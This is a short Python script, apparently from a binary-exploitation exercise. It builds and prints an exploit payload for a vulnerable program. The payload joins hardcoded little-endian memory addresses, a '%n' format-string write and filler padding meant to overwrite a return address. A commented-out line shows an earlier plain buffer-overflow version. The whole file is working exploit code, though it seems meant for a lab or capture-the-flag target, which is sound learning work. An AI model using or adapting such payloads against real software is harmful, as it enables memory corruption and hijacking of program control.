# padding = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRR" + "\xad\x55\x55\x56"

padding = "\x0c\x70\x55\x56" + "%n "  + "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP" + "\xad\x55\x55\x56"

print(padding)